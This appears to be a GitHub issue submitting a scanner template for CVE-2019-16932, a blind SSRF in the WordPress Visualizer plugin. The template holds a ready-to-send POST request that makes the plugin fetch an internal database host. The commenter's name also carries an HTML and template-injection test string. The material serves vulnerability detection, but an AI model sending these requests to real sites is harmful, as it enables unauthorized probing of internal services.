CVE-2019-16931 & CVE-2019-16932
akincibor opened this issue · comments
<h1>Akincibor</h1>${7*7}{{7*7}} commented
id: CVE-2019-16932
info:
name: Visualizer < 3.3.1 - Blind Server-Side Request Forgery (SSRF) & Stored XSS
author: akincibor
severity: high
description: This plugin suffers from a blind SSRF vulnerability in the /wp-json/visualizer/v1/upload-data endpoint.
reference:
- https://wpscan.com/vulnerability/9892
- https://nathandavison.com/blog/wordpress-visualizer-plugin-xss-and-ssrf
tags: wp-plugin,ssrf,wordpress,wp,xss
requests:
- method: POST
path:
- '{{BaseURL}}/wp-json/visualizer/v1/upload-data'
headers:
Content-Type: application/x-www-form-urlencoded
body: '{\"url\":\"http://db:3306\"}'
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- 'db_1'
part: body